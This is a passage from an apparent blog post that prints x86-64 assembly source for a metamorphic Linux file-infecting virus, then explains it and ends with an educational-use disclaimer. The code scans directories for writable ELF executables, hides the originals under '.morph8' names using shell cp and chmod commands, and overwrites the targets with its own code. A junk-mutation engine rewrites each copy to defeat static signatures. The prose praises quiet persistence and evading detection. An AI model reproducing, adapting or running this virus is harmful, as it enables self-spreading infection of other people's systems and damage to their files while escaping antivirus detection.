    ; get different register
    call get_random
    and eax, 3
    cmp al, dil
    je .rex_xchg            ; retry if same

    ; build REX.W XCHG r1, r2
    mov byte [r8], REX_W
    mov byte [r8 + 1], XCHG_OP

    ; ModR/M byte
    mov bl, XCHG_BASE
    mov cl, al
    shl cl, 3
    add bl, cl
    add bl, dil
    mov [r8 + 2], bl

    mov eax, 3
    ret

; instruction decoder
trace_jmp:
    push rbx
    push rcx

    cmp rsi, [codelen]
    jae .invalid

    mov r8, code
    mov al, [r8 + rsi]

    ; check for NOP
    cmp al, NOP
    je .ret_1

    ; check MOV+reg
    mov bl, MOV
    add bl, dil
    cmp al, bl
    je .ret_5

    ; check prefix instruction
    mov rbx, prefixes
.check_prefix:
    mov cl, [rbx]
    test cl, cl
    jz .invalid
    cmp cl, al
    je .check_second_byte
    inc rbx
    jmp .check_prefix

.check_second_byte:
    inc rsi
    cmp rsi, [codelen]
    jae .invalid

    mov al, [r8 + rsi]
    cmp al, 0xC0
    jb .invalid
    cmp al, 0xFF
    ja .invalid
    and al, 7
    cmp al, dil
    jne .invalid

.ret_2:
    mov eax, 2
    jmp .done
.ret_1:
    mov eax, 1
    jmp .done
.ret_5:
    mov eax, 5
    jmp .done
.invalid:
    xor eax, eax
.done:
    pop rcx
    pop rbx
    ret

; junk mutation engine
replace_junk:
    push r12
    push r13
    push r14
    push r15

    mov r8, [codelen]
    test r8, r8
    jz .done

    cmp r8, JUNKLEN
    jle .done

    sub r8, JUNKLEN
    mov r9, code
    xor r12, r12

.scan_loop:
    cmp r12, r8
    jae .done

    mov rax, [codelen]
    cmp r12, rax
    jae .done

    ; scan for junk pattern
    movzx eax, byte [r9 + r12]
    cmp al, PUSH
    jb .next_i
    cmp al, PUSH + 3        ; rax,rbx,rcx,rdx only
    ja .next_i

    ; second byte must be PUSH
    movzx ebx, byte [r9 + r12 + 1]
    cmp bl, PUSH
    jb .next_i
    cmp bl, PUSH + 3
    ja .next_i

    ; check REX.W prefix
    cmp byte [r9 + r12 + 2], REX_W
    jne .next_i

    ; check XCHG opcode
    cmp byte [r9 + r12 + 3], XCHG_OP
    jne .next_i

    ; validate complete sequence
    call validate
    test eax, eax
    jz .next_i

    ; replace with new junk
    call insert

.next_i:
    inc r12
    jmp .scan_loop

.done:
    pop r15
    pop r14
    pop r13
    pop r12
    ret

; validate junk pattern
validate:
    push rbx
    push rcx

    ; extract registers from PUSH
    movzx eax, byte [r9 + r12]
    sub al, PUSH
    mov bl, al              ; reg1

    movzx eax, byte [r9 + r12 + 1]
    sub al, PUSH
    mov cl, al              ; reg2

    ; registers must differ
    cmp bl, cl
    je .invalid

    ; check POP sequence (reversed)
    movzx eax, byte [r9 + r12 + 8]
    sub al, POP
    cmp al, cl
    jne .invalid

    movzx eax, byte [r9 + r12 + 9]
    sub al, POP
    cmp al, bl
    jne .invalid

    mov eax, 1              ; Valid sequence
    jmp .done

.invalid:
    xor eax, eax
.done:
    pop rcx
    pop rbx
    ret

; insert new junk sequence
insert:
    push rdi

    mov rdi, r9
    add rdi, r12
    call spawn_junk

    pop rdi
    ret

;; shell command execution
exec_sh:
    sub rsp, 0x40
    mov qword [rsp], sh_arg0_ptr
    mov qword [rsp+8], rdi
    mov qword [rsp+16], 0

    mov rsi, rsp
    xor rdx, rdx

    mov rdi, shell_path
    mov rax, SYS_execve
    syscall
    mov rdi, 1
    call sys_exit

sh_arg0_ptr: dq sh_arg0
sh_arg1_ptr: dq sh_arg1

list:                           ; scan directory for infection targets
    push rbp
    mov rbp, rsp
    push r12
    push r13
    push r14
    push r15

    mov r14, rsi

    mov rdi, current_dir
    mov rsi, O_RDONLY
    mov rdx, 0
    call sys_open
    cmp rax, 0
    jl .list_error
    mov r12, rax

.list_loop:
    mov rdi, r12
    mov rsi, dir_buf
    mov rdx, 4096
    call sys_getdents64
    cmp rax, 0
    je .list_done
    mov r13, rax

    xor r15, r15

.list_entry:
    cmp r15, r13
    jge .list_loop

    mov rdi, dir_buf
    add rdi, r15

    mov r8, rdi
    add r8, 16
    movzx rax, word [r8]    ; d_reclen at offset 16

    cmp rax, 19
    jl .skip_entry
    cmp rax, 4096
    jg .skip_entry

    push rax

    mov r8, rdi
    add r8, 18
    mov cl, [r8]

    cmp cl, 8
    jne .skip_entry

    add rdi, 19

    cmp byte [rdi], '.'
    jne .check_file
    mov r8, rdi
    inc r8
    cmp byte [r8], 0
    je .skip_entry
    mov r8, rdi
    inc r8
    cmp byte [r8], '.'
    je .skip_entry

.check_file:
    push rdi

    mov rdi, r14
    call basename

    mov rsi, rax
    mov rdi, [rsp]
    call strcmp

    pop rdi
    test rax, rax
    jz .chosen_one

    push rdi
    push rsi
    push rbx

    ; Check if filename starts with .morph8
    mov rsi, hidden_prefix
    mov rbx, rdi

.see_hidden:
    mov al, [rbx]
    mov dl, [rsi]
    test dl, dl
    jz .is_hidden       ; End of prefix - it's a hidden file
    cmp al, dl
    jne .not_hidden     ; Mismatch - not hidden
    inc rbx
    inc rsi
    jmp .see_hidden

.is_hidden:
    pop rbx
    pop rsi
    pop rdi
    jmp .skip_entry

.not_hidden:
    pop rbx
    pop rsi
    pop rdi

    mov rsi, vxx_str
    call strstr
    test rax, rax
    jnz .found_vxx

    push rdi
    mov rsi, X_OK
    call sys_access
    pop rdi
    cmp rax, 0
    jne .not_exec

    push rdi
    mov rsi, W_OK
    call sys_access
    pop rdi
    cmp rax, 0
    jne .not_exec

    jmp .e_conditions

.not_exec:
    jmp .skip_entry

.e_conditions:
    sub rsp, 256
    mov r8, rsp
    push rdi

    mov rdi, r8
    mov rsi, [rsp]
    call hidden_name

    mov rax, SYS_open
    mov rdi, r8
    mov rsi, O_RDONLY
    xor rdx, rdx
    syscall

    pop rdi
    test rax, rax
    js .not_exists

    ; Hidden file exists - been here, skip it
    push rdi
    mov rdi, rax
    call sys_close
    pop rdi
    add rsp, 256
    jmp .skip_entry

.not_exists:
    add rsp, 256

    ; Check if we're trying to infect ourselves
    push rdi                ; Save current filename

    ; Get our own basename
    mov rdi, bin_name
    call basename
    mov rsi, rax

    mov rdi, [rsp]
    call strcmp

    pop rdi

    test rax, rax
    jz .skip_self_infection ; If filenames match, skip infection

    ; Check if file is a valid ELF executable before infection
    push rdi
    call is_elf
    pop rdi
    test rax, rax
    jz .skip_non_elf        ; Not a valid ELF, skip infection

    push rdi
    call implant
    pop rdi
    jmp .skip_entry

.skip_self_infection:
    ; Don't infect ourselves, just skip
    jmp .skip_entry

.skip_non_elf:
    ; Not a valid ELF executable, skip infection
    jmp .skip_entry

.chosen_one:
    push rdi
    mov rsi, rdi
    mov rdi, orig_exec_name
    call strcpy
    pop rdi
    jmp .skip_entry

.found_vxx:
    mov byte [vierge], 0

.skip_entry:
    pop rax
    add r15, rax
    jmp .list_entry

.list_done:
    mov rdi, r12
    call sys_close

.list_error:
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbp
    ret

implant:                        ; infect target executable
    push r12
    push r13
    mov r12, rdi

    ; Validate input
    test r12, r12
    jz .d_skip

    push r12
    mov rdi, r12
    call strlen
    pop r12
    mov r13, rax

    ; Check filename length bounds
    cmp r13, 200
    jg .d_skip
    test r13, r13
    jz .d_skip

    ; Check if we have code to embed
    mov rax, [codelen]
    test rax, rax
    jz .d_skip
    cmp rax, 65536
    jg .d_skip

    ; 1: Create hidden backup of original file
    sub rsp, 768
    mov rdi, rsp
    add rdi, 512             ; Use third section for hidden name
    mov rsi, r12
    call hidden_name

    ; Check if hidden backup already exists
    mov rax, SYS_open
    mov rdi, rsp
    add rdi, 512             ; hidden name
    mov rsi, O_RDONLY
    xor rdx, rdx
    syscall

    test rax, rax
    js .fallback             ; File doesn't exist, create backup

    mov rdi, rax
    call sys_close
    jmp .infect_orgi         ; Proceed to reinfect with new mutations

.fallback:
    mov rdi, rsp             ; Use first section for command
    mov rsi, cp_cmd_fmt
    mov rdx, r12             ; original filename
    mov rcx, rsp
    add rcx, 512             ; hidden name
    call sprintf_two_args
    mov rdi, rsp
    call system_call

    ; Set permissions on hidden file
    mov rdi, rsp
    add rdi, 256             ; Use second section for chmod command
    mov rsi, chmod_cmd_fmt
    mov rdx, rsp
    add rdx, 512             ; hidden name
    call sprintf
    mov rdi, rsp
    add rdi, 256
    call system_call

.infect_orgi:
    add rsp, 768

    ; 2: Replace original file with viral code
    mov rdi, r12             ; original filename
    mov rsi, code
    mov rdx, [codelen]
    call write_f

.d_skip:
    pop r13
    pop r12
    ret

;; payload execution
execute:                        ; virus payload
    JUNK

    mov rdi, msg_cat
    call strlen
    mov rdx, rax

    mov rdi, 1
    mov rsi, msg_cat
    call sys_write
    JUNK
    ret

hidden_name:                    ; create .morph8
    push rsi
    push rdi
    push rbx
    push rcx

    mov rbx, rsi
    mov rcx, hidden_prefix

.check_prefix:
    mov al, [rbx]
    mov dl, [rcx]
    test dl, dl
    jz .already_one          ; it matches
    cmp al, dl
    jne .add_prefix          ; Mismatch
    inc rbx
    inc rcx
    jmp .check_prefix

.already_one:
    ; File already has .morph8 prefix, just copy it
    jmp .cp_file

.add_prefix:
    ; Add .morph8 prefix
    mov byte [rdi], '.'
    mov byte [rdi + 1], 'm'
    mov byte [rdi + 2], 'o'
    mov byte [rdi + 3], 'r'
    mov byte [rdi + 4], 'p'
    mov byte [rdi + 5], 'h'
    mov byte [rdi + 6], '8'

    add rdi, 7

.cp_file:
    mov al, [rsi]
    test al, al
    jz .done
    mov [rdi], al
    inc rsi
    inc rdi
    jmp .cp_file

.done:
    mov byte [rdi], 0

    pop rcx
    pop rbx
    pop rdi
    pop rsi
    ret

sprintf:                        ; basic string formatting
    push r9
    push r10

    mov r8, rdi                 ; dst
    mov r9, rsi                 ; string
    mov r10, rdx                ; arg

.scan_format:
    mov al, [r9]
    test al, al
    jz .done

    cmp al, '%'
    je .found_percent

    mov [r8], al
    inc r8
    inc r9
    jmp .scan_format

.found_percent:
    inc r9
    mov al, [r9]
    cmp al, 's'
    je .cp_arg
    cmp al, '%'
    je .cp_percent

    ; Unknown format, copy literally
    mov byte [r8], '%'
    inc r8
    mov [r8], al
    inc r8
    inc r9
    jmp .scan_format

.cp_percent:
    mov byte [r8], '%'
    inc r8
    inc r9
    jmp .scan_format

.cp_arg:
    push r9
    mov r9, r10
.cp_loop:
    mov al, [r9]
    test al, al
    jz .cp_done
    mov [r8], al
    inc r8
    inc r9
    jmp .cp_loop

.cp_done:
    pop r9
    inc r9
    jmp .scan_format

.done:
    mov byte [r8], 0
    pop r10
    pop r9
    ret

sprintf_two_args:               ; string with two args
    push rbp
    mov rbp, rsp
    push r10
    push r11
    push r12

    mov r8, rdi                 ; dst buffer
    mov r9, rsi                 ; string
    mov r10, rdx                ; 1 arg
    mov r11, rcx                ; 2 arg
    xor r12, r12                ; arg cnt

.cp_loop:
    mov al, [r9]
    test al, al
    je .done
    cmp al, '%'
    je .handle_format
    mov [r8], al
    inc r8
    inc r9
    jmp .cp_loop

.handle_format:
    inc r9
    mov al, [r9]
    cmp al, 's'
    je .cp_string
    cmp al, '%'
    je .cp_percent

    mov byte [r8], '%'
    inc r8
    mov [r8], al
    inc r8
    inc r9
    jmp .cp_loop

.cp_percent:
    mov byte [r8], '%'
    inc r8
    inc r9
    jmp .cp_loop

.cp_string:
    cmp r12, 0
    je .use_arg1
    mov rdx, r11                ; second arg
    jmp .do_cp
.use_arg1:
    mov rdx, r10                ; first arg
.do_cp:
    inc r12

    push r9
    push rdx
    mov r9, rdx
.str_cp:
    mov al, [r9]
    test al, al
    je .str_done
    mov [r8], al
    inc r8
    inc r9
    jmp .str_cp

.str_done:
    pop rdx
    pop r9
    inc r9
    jmp .cp_loop

.done:
    mov byte [r8], 0
    pop r12
    pop r11
    pop r10
    pop rbp
    ret

system_call:                    ; execute shell
    push r12
    mov r12, rdi

    mov rax, SYS_fork
    syscall
    test rax, rax
    jz .child_process
    js .error

    mov rdi, rax
    xor rsi, rsi
    xor rdx, rdx
    xor r10, r10
    mov rax, SYS_wait4
    syscall

    pop r12
    ret

.child_process:
    sub rsp, 32
    mov qword [rsp], sh_arg0
    mov qword [rsp+8], sh_arg1
    mov qword [rsp+16], r12
    mov qword [rsp+24], 0

    mov rax, SYS_execve
    mov rdi, shell_path
    mov rsi, rsp
    xor rdx, rdx
    syscall

    mov rax, SYS_exit
    mov rdi, 1
    syscall

.error:
    pop r12
    ret

;;  entry point
_start:
    ; anti goes here
    ;avant:
    call d_str   ; Decrypt all

    mov rax, SYS_getrandom
    mov rdi, signme
    mov rsi, 4
    xor rdx, rdx
    syscall

    mov al, [vierge_val]
    mov [vierge], al

    pop rdi
    mov rsi, rsp
    push rsi

    mov rdi, bin_name
    mov rsi, [rsp]
    call strcpy

    mov rdi, [rsp]
    call basename
    mov rdi, orig_exec_name
    mov rsi, rax
    call strcpy

    call execute

    pop rsi
    push rsi

    ; Read our own code
    mov rdi, [rsi]
    call read_code

    mov rax, [codelen]
    test rax, rax
    jz .skip_mutation

    ; Apply mutations
    call replace_junk

.skip_mutation:
    pop rsi
    push rsi
    mov rdi, current_dir
    mov rsi, [rsi]
    call list

    cmp byte [vierge], 1
    jne .exec_theone

    cmp byte [orig_exec_name], 0
    jne .orig_name_ok
    mov rdi, bin_name
    call basename
    mov rdi, orig_exec_name
    mov rsi, rax
    call strcpy

.orig_name_ok:
    ; Build hidden name for the chosen one
    sub rsp, 512
    mov rdi, rsp
    add rdi, 256
    mov rsi, orig_exec_name
    call hidden_name

    ; Create touch command
    mov rdi, rsp             ; Use first half for command
    mov rsi, touch_cmd_fmt
    mov rdx, rsp
    add rdx, 256             ; Point to hidden name
    call sprintf
    mov rdi, rsp
    call system_call

    ; Create chmod command
    mov rdi, rsp             ; Reuse first half for command
    mov rsi, touch_chmod_fmt
    mov rdx, rsp
    add rdx, 256             ; Point to hidden name
    call sprintf
    mov rdi, rsp
    call system_call
    add rsp, 512

.exec_theone:
    mov rdi, bin_name
    mov rsi, hidden_prefix
    call strstr
    test rax, rax
    jnz .killme

    ; Build hidden name and execute it
    sub rsp, 512
    mov rdi, rsp
    add rdi, 256             ; Use second half for hidden name
    mov rsi, orig_exec_name
    call hidden_name

    ; Create exec command
    mov rdi, rsp             ; Use first half for command
    mov rsi, exec_cmd_fmt
    mov rdx, rsp
    add rdx, 256             ; Point to hidden name
    call sprintf
    mov rdi, rsp
    call system_call
    add rsp, 512

.killme:
    ; Clean up any leftovers
    call zero0ut

    pop rsi
    xor rdi, rdi
    mov rax, SYS_exit
    syscall

zero0ut:
    mov rdi, code
    mov rcx, 65536
    xor al, al
    rep stosb

    mov rdi, dir_buf
    mov rcx, 4096
    xor al, al
    rep stosb

    mov rdi, temp_buf
    mov rcx, 1024
    xor al, al
    rep stosb

    ret

read_code:
    mov rsi, code
    call read_f
    test rax, rax
    js .error

    mov [codelen], rax
    ret

.error:
    mov qword [codelen], 0
    ret

extract_v:
    push r12
    push r13
    push r14

    mov rdi, bin_name
    mov rsi, code
    call read_f
    test rax, rax
    js .err_v

    cmp rax, 65536
    jle .size_ok
    mov rax, 65536

.size_ok:
    mov [codelen], rax
    jmp .ext_done

.err_v:
    mov qword [codelen], 0
    xor rax, rax

.ext_done:
    pop r14
    pop r13
    pop r12
    ret
Enter fullscreen mode Exit fullscreen mode

This Is Only the Foundation

Its purpose is to demonstrate core mechanisms, not to claim coverage of a complete system. Metamorphic and polymorphic engines go far deeper than what is shown here. What we have now is a starting point — sufficient to prove the concept, but still far from full-spectrum capability.

Currently, the mutation engine only processes its own defined junk patterns. It does not touch arbitrary instruction sequences. It also only supports basic register replacement so far. Features such as instruction reordering, control-flow rewriting, and logical substitution are absent.

Mutation patterns are hard-coded. There is no adaptive behavior. Propagation logic is also kept simple.

vx-mutation-demo

Each generation becomes different at the byte level, yet does the same things. What changes is the implementation, not the behavior. This is exactly why it shatters static signatures.

As the VX repeatedly reinfects, the code drifts further from its original form. The hidden backup mechanism helps it stay low-profile. The original file continues to run normally, allowing the VX to persist quietly.

Of course, these capabilities come at a cost: CPU and memory consumption, and doubled storage usage due to backups.

— Possibilities —

If you want to push further, you will need a larger pattern library, smarter runtime self-analysis, clean syscall abstraction for cross-platform support, and deeper code analysis with control-flow and data-flow mapping.

Combine it with polymorphism: encrypted payload + deformable code structure creates a layered system. Surface randomization, internal concealment, final behavior invariant. The adversary will find almost no stable anchor points.

Metamorphic code proves that software can continuously evolve its own implementation while keeping its goals unchanged.

I recommend running the code inside a debugger rather than executing it blindly. Set breakpoints and step down into the assembly layer to inspect exactly what is being generated. This is the best way to catch subtle anomalies.

That’s all for now — see you next time.

Disclaimer:

This blog post is provided solely for educational and research purposes. All technical details and code examples are intended to help defenders understand attack techniques and improve security posture. Please do not use this information to access or interfere with systems you do not own or lack explicit permission to test. Unauthorized use may violate laws and ethical standards. The author assumes no responsibility for any misuse or damage resulting from the application of the concepts discussed.


Top comments (0)